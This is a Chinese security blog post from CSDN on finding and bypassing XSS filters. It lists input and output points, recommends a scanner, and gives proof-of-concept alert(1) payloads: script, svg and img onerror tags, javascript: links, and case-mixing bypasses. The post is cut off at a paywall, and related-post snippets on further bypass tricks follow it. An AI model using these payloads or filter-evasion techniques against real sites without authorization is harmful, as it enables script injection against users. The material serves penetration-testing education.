XSS 绕过思路 bypass 之日天日地日空气

最新推荐文章于 2024-10-01 06:00:00 发布
最新推荐文章于 2024-10-01 06:00:00 发布
阅读量1.1k 收藏 4
点赞数 3
分类专栏: Web安全 渗透测试 文章标签: xss 信息安全 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_39997096/article/details/109270493
版权

前文

Hello,大家好,我是None Sec的C_soon5,今天给大家讲讲XSS Bypass

 

XSS挖掘思路

1:输入点和输出点进行XSS

输入点

URL参数

表单内容

JSONP

 

输出点

输出在标签之间,例如:<script>输出</script>

输出在属性之中,例如:<input value="输出" name="keyword">

输出在注释之中,例如://document.getElementById("order_select").value="输出"

 

2:扫描器

这里强烈推荐Xray,配合被动扫描,简直比一刀999还爽

 

Bypass

之前我根据CTF特训营的XSS Bypass写了篇文章:XSS绕WAF,大家可以看看

 

1:未经过任何过滤直接输出

<script>alert(1)</script>

<svg/οnlοad=alert(1)>

<img src=# οnerrοr=alert(1)>

<img src=# οnerrοr="javascript:alert(1)">

<a href=# οnmοuseοver=alert(1)>click</a>

<a href="javascript:alert(1)">click</a>

<iframe/οnlοad=alert(1)></iframe>

 

2:过滤关键字绕过

a、大小写绕过(仅限于未先转换为小写,直接替换关键字的情形)

<Script>alert(1)</scRipt>

<img srC=# onError=alErt(1)></img>

<a href=# onMouseover=Alert(1)></a>

 

b、双写

最低0.47元/天 解锁文章
None安全团队
关注
专栏目录
C# 实现 java URLEncoder.encode编码
别看,很懒,随心
09-08 2924
** 最近碰到一个很坑很难受的问题,公司对接一个java项目碰到C# url编码跟java url编码后不一样,导致最后加密结果不一样 ** C# 中文url编码后是小写的 java 中文url编码后是大写的,且会对非安全字符进行编码 不说了,直接上码: 这里得注意一下,有些地方个别情况特殊符号没进行编码的,还是得自己手动Replace一下对应编码 public static class Utils { private static string UrlEncode(this str
xss绕过字符过滤_XSS绕过实战练习
weixin_39640203的博客
12-21 777
前言写这篇博文起源来自于一次网络安全实验课,在实验虚拟环境里有一个xss挑战,估计是搬别人的xss挑战进来,我觉得挺有意思,就记录一下。有些关卡不能再虚拟环境实践,我在自己物理机上找到那个xss挑战平台进行实现。level1未进行过滤,直接输入payloadpayload:alert(/xss/)level2发现对html特殊符号进行了实体编码,失效,但是发现下面input标签里还有一个输出点,可...
XSS bypass
Fly_鹏程万里
12-18 1106
前言 在开始之前,我们先说一说XSS漏洞挖掘思路流程: 思路流程: 1、查找输入点与输出点的位置:      输入点好找,一般都是URL当中的参数,或者表单内容项等,而输出点一般有以下常见的几种情形: 输出在标签之间,例如:&lt;script&gt;输出&lt;/script&gt; 输出在属性之中,例如:&lt;input value="输出" name="keyword"&gt; ...
XSS | XSS 常用语句以及绕过思路
最新发布
Blue17 の 小窝
10-01 1597
以确保文本在不同系统之间可以无差错的转换和显示。由于 ASCII 码已经广泛使用并且很好地满足了英文字符的编码需求,Unicode 在设计时决定保留 ASCII 编码的字符集,并将其作为 Unicode 编码的一个子集。因此,
xssbypass_XSS Bypass
weixin_36463451的博客
12-23 297
如果无法学会绕过,那就只有一个结果:Bypass学习文章来源:米斯特安全团队JS代码往往要在标签内或者在 “On” 事件和 “javascript” 伪协议内才可以执行。标签表达式: 没被安全狗过滤的标签:a b q br dd dl dt h1 h2 h3 h4 h5 h6 hr bdi bdo big del dfn dir div kbd map var wbr abbr area base...
xss绕过思路
W小哥
04-13 2409
1、前端限制绕过(比如:JS),直接抓包改包重放,或者修改html前端代码 2、大小写绕过,比如:pt> 4、使用注释进行干扰:<script>alert(/xss/)</script> 后台过滤了特殊字符,比如 ...
XSS Bypass
Grey的博客
07-30 1280
1. XSS攻击原理 XSS原称为CSS(Cross-Site Scripting),因为和层叠样式表(Cascading Style Sheets)重名,所以改称为XSS(X一般有未知的含义,还有扩展的含义)。XSS攻击涉及到三方:攻击者,用户,web server。用户是通过浏览器来访问web server上的网页,XSS攻击就是攻击者通过各种办法,在用户访问的网页中插入自己的脚本,让其在用...
XSSBypass:XSS绕过技术
05-17
**XSS(跨站脚本攻击)Bypass:探索XSS绕过技术** XSS(Cross-Site Scripting)是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本,进而执行非授权的操作。当Web应用程序未能充分地验证和转义...
xss绕过html实体化,通过脚本片段绕过XSS防御
weixin_42386511的博客
06-07 1756
原标题:通过脚本片段绕过XSS防御 从恶作剧弹框到盲打后台乃至沦陷一个企业,XSS的危害可大可小,近年来,XSS攻击与防御的博弈持续不断,下面是今年5月份北爱尔兰首府举行的OWASP AppSec EU的安全议题:通过脚本片段绕过XSS防御。一、XSS 防御措施尽管业界付出了很多努力,XSS依然是一个广泛且未解决的问题。有数据指出:谷歌VRP中70%的漏洞是XSS漏洞。XSS防御技术的通用假设为:...
xss常见的bypass方案
03-06
常见的xss bypass方案~
3. XSS_ByPass
HWHXY的博客
01-17 276
layout: post title: 3. XSS_ByPass category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第3篇小文章,内容为某网站的xssbypassxss特征 在修改个人头像信息的地方没有过滤" and <,导致了这次的xss的触发,而我认为,基本所有的如上情况都是有很大可能触发xss的。后端存在一些waf,存在的形式是黑名单。例如: <script>,<a>这样的形式均会将<&.
XSS Bypass Cookbook
晓川吖的专栏
09-13 325
1 引言 在目前的web安全漏洞中,xss一直属于热门的一类,而它对用户造成的危害较大。 因此也引发了不少安全爱好者和专业工程师的研究。 而html5等新技术的使用和具体业务场景中复杂的环境带给了xss更大的生存空间。 而且不同xss向量也因为浏览器的特性会有所区别 比如chrome在加载资源时会校验服务器返回的mimeType 而firefox则根据标签自己设定的type来做出处理 本文在目前较为常见的几种过滤条件下,简单的探讨了xss这一技术的应用以及绕过 1.1 研究范围 XSS在各种具体业.
xss绕过思路讲解和案例演示
北冥有鱼
04-24 545
一、xss绕过-过滤-转换 前面的XSS讲过,有限制字符这样的设置,是通过前端来设置的,我们通过抓包重放或者修改html前端代码就能绕过这个安全措施,前端虽然可以去做一些辅助的安全措施,但实际上它是没有太大作用的 大小写混合,一般的网页会通过匹配或者函数来给识别过滤出来,如果网页没有对大写进行限制或者大小写混合进行限制,那么就会通过大小写混合来绕过。 举个栗子: 这里通过onerror可以来...
XSS————2、XSS bypass
Fly_鹏程万里
10-19 1672
0x00前言 XSS有反射、存储、DOM三种类型,不同类型的xss的危害各不相同,下面做一个简要说明: 数据流向: 反射型:浏览器——》后端——》浏览器 存储型:浏览器——》后端——》数据库——》后端——》浏览器 DOM型:URL——》浏览器 易用程度: 存储型 &gt; DOM型 &gt; 反射型 接下来我们就进入正题————“XSS技巧”,在本篇文章当中我们将对xss绕过技巧做一个系统...
xssbypass_XSS bypass姿势
weixin_34122028的博客
12-27 780
一位苦于信息安全的萌新小白帽本实验仅用于信息防御教学,切勿用于它用途公众号:XG小刚尝试构造xss,突破各种限制闭合标签通过各种方式,闭合前面的语句常规闭合"><script>alert(1);script>闭合大部分标签*/-->'");>iframe>script>style>title>textarea><...
8. xss bypass
HWHXY的博客
01-17 305
layout: post title: 8. xss bypass category: SRC tags: SRC keywords: SRC,XSS 前言 该篇记录为记录实际的src过程第8篇小文章,内容为某网站的xssbypassXSS特征 这个点是一处app发布,可以插入a标签和img标签,但是a标签只能插入链接,否则会出错。条件很苛刻。 这时就想到了再找一个反射,把反射链接插进去,就相当于a+反射=点击存储。思路正确!开始找反射,好不容易找到一个,但是waf极强, on属性基本被消灭,遗留下来.
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值